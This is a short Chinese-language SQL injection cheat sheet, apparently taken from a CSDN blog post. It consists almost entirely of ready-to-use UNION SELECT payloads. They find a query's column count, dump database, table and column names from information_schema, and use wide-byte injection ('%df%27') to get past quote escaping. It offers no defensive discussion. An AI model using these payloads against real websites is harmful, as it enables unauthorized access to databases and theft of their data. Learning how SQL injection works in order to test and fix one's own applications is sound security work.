0 'union select 1,2,3……………… # 到几时失败的前一个就是列数,比如1,2,3,4时不报错,加个5报错那么说明有4列
' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #爆数据库名,表名
获取news 表的字段名,数据类型:
' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='news'# news是表名
宽字节注入:
爆库名: id=%df%27 and 1=2 union select 2,database()%23
爆表名:
id=%df%27 and 1=2 union select 2,group_concat(table_name) from information_schema.tables where table_schema=database()%23
来源:CSDN
作者:~何止~
链接:https://blog.csdn.net/weixin_43900387/article/details/104077329